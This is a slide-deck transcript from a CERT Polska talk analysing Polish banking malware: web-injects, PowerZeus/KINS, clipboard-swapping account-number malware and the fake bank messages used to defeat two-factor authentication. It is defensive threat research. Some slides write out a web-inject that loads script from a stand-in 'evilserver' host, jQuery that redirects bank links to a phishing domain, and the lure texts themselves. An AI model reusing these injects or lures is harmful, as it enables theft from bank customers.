Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Polish Money Stealing Scene

piotrk
February 05, 2015

The Polish Money Stealing Scene

piotrk

February 05, 2015
Tweet

More Decks by piotrk

Other Decks in Research

Transcript

  1. The  Polish  Money  Stealing   Scene        

    Piotr  Kijewski   [email protected]   @piotrkijewski            29th  Jan  2015  
  2. Main  actors   •  Web-­‐inject  malware   •  Hacked  home

     routers   •  Home  grown  “middle  income”  “banking”   malware  that  introduces  new  tricks       2  
  3. SupporGng  actor   •  Classic  phishing  sGll  there   • 

    About  20  or  so  campaigns  against  Polish  banks   in  2014   •  Not  so  effecGve  against  two  factor   authenGcaGon          ….    but  they  do  collect  data   •  Widely  reported  in  media,  so  bad  PR  for  a   bank   3  
  4. Web-­‐inject   Target  URL  :  “*/our  internet  bank/*”   data_before

       <head>   data_aeer    <body>   data_inject    <script  type=“text/javascript”  src=hhps:// evilserver.example/grabmoney.js”>   </script>   7  
  5. Scenarios   •  Web-­‐inject  scenarios  are  at  the  core  of

     money   thee   •  Bad  guys  test  transacGon  systems  for   elements  that  they  can  leverage  in  scenarios   •  Bad  guys  monitor  financial  sector  news  &   events  to  adapt  scenarios   •  Goal  is  to  bypass  two  factor  authenGcaGon  by   exploiGng  the  user     10  
  6. “Defined  bank  transfer”   The Bank is changing the format

    of the account. Please confirm the operation, including the new account number should be specified as a recipient defined. New account number will be active after 7 days if the operation is not confirmed, the adoption of transfers on your account will be impossible. Please enter the code SMS number: 334 Note:  TranslaGon  reflects  original  crappy  Polish  text   13  
  7. “Insurance”   Because of the growing prevalence of fraudulent transactions

    from accounts of customers all internet bank payments must be insured. payment amount for 300000zł - free payment amount over 300000zł - 50 zł Note:  TranslaGon  reflects  original  crappy  Polish  text   14  
  8. “Cannot  idenGfy  your  computer”   The alarm system is not

    able to identify your computer. This may be due to a recent software update or a new IP address assigned by your ISP. In this case, you must authenticate the computer to avoid blocking the account. Please authorization by the token. Note:  TranslaGon  reflects  original  crappy  Polish  text   15  
  9. “Trusted  phone  number”   We are updating the phone bank

    for sms code of <insert bank name> banking system to the safety of our customers we introduce secure line connection. You need to activate the new code SMS We take care of the safety of the banking system <insert bank name> Note:  TranslaGon  reflects  original  crappy  Polish  text   16  
  10. PowerZeus/KINS   •  Started  targeGng  Polish  users  around  July  2013

      •  Combines  3  features:  webinjects  (Zeus),  plugin  API  (SpyEye),   code  injecGon  methods  used  by  Power  Loader  (Alureon)   •  Modules  downloaded  by  framework  (essenGally  what   PowerZeus  is)   •  Included  a  module  we  called  zeus-­‐dll  (encrypted  on  disk)   •  This  parGcular  instance  aimed  at  installing  the  poland.apk,   polska.apk,  e-­‐security.apk  on  an  Android   •  This  instance  used  .ru  domains  for  C&C  and  .pl  domains  for   malicous  app  distribuGon         20  
  11. Command  features  …  +  steganography   •  get  info  

    – starts  with  #,  phone  no.  somewhere  in  message   •  new  number   – starts  with  /,  phone  no.  somewhere  in  message     •  fin   – starts  with  ,   •  uninstall   –   starts  with  !     +34  668  …   21  
  12. Sinkhole  stats  unique  IPs/day   Sample  date:   12/11/2013  

    Takedown  together  with  Kaspersky   23  
  13. Scenario  1   The  following  code  was  injected  in  downloaded

     HTML:   <script>   jQuery(document).ready(funcGon()  {   jQuery('a[href*="ebgz.pl"]').ahr('href','hhp://ssl-­‐.ebgz.pl/');   jQuery('li  p  a.buhon.green').ahr('href','hhp://ssl-­‐.ebgz.pl/');   });   </script>   28  
  14. Bank  Account  Number  (BAN)     CCAAAAAAAABBBBBBBBBBBBBBBB     CC

     AAAA  AAAA  BBBB  BBBB  BBBB  BBBB     •  control  sum  (inline  with  IBAN  standard)   •  bank  number   •  account  number   32  
  15. VBKlip  /  Banapter   •  A  simple  piece  of  VB

     (later  variants  in  .NET)   that  alters  contents  of  Windows  clipboard.   •  Any  string  of  26  digits  (opGonally  separated  by   whitespaces)  is  changed  to  another  one.   •  Early  versions  had  the  account  number   hardcoded,  currently  it’s  updated  from  a  C2   server.   33  
  16. Banatrix   •  Banatrix  scans  memory  of  running  processes  that

      match  iexplore.exe,  firefox.exe,  chrome.exe,  and   opera.exe.   •  Similar  to  VBKlip/Banapter,  banatrix  changes  26-­‐digit   strings  to  a  different  one.   •  Monitoring  limited  to  one  browser  process,  may   crash  browser.   37  
  17. Future  Winner?     •  Ransomware   –   Older  Weelsof/Reveton

     in  2011/12  had  massive   impact   –   InteresGngly,  nothing  much  since  then   –   Cryptolocker,  Cryptowall  not  really  present   •  But  it  will  be  bad  when  it  hits   41  
  18.             Contact:  [email protected],  [email protected]  

    Twiher:  @piotrkijewski,  @cert_polska_en   Web:  www.cert.pl   44